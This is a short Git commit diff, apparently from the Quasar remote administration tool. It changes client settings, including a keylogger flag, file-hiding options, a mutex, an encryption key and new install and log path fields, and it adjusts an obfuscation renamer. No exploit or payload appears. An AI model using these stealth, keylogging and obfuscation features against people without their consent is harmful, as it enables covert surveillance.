Fix release build

This commit is contained in:
MaxXor 2020-05-26 23:05:32 +02:00
parent c735d0fcab
commit 547ab1feef
2 changed files with 4 additions and 2 deletions

View File

@ -24,7 +24,7 @@ public static class Settings
public static string MUTEX = "123AKs82kA,ylAo2kAlUS2kYkala!";
public static string STARTUPKEY = "Test key";
public static bool HIDEFILE = false;
public static bool ENABLELOGGER = true;
public static bool ENABLELOGGER = false;
public static string ENCRYPTIONKEY = "-.)4>[=u%5G3hY3&";
public static string TAG = "DEBUG";
public static string LOGDIRECTORYNAME = "Logs";
@ -63,6 +63,8 @@ public static bool Initialize()
public static X509Certificate2 SERVERCERTIFICATE;
public static bool HIDELOGDIRECTORY = false;
public static bool HIDEINSTALLSUBDIRECTORY = false;
public static string INSTALLPATH = "";
public static string LOGSPATH = "";
public static bool Initialize()
{

View File

@ -57,7 +57,7 @@ public bool Perform()
private void RenameInType(TypeDefinition typeDef)
{
if (!typeDef.Namespace.StartsWith("Quasar") /* || typeDef.HasInterfaces */)
if (!typeDef.Namespace.StartsWith("Quasar") || typeDef.Namespace.StartsWith("Quasar.Common.Messages") /* || typeDef.HasInterfaces */)
return;
_typeOverloader.GiveName(typeDef);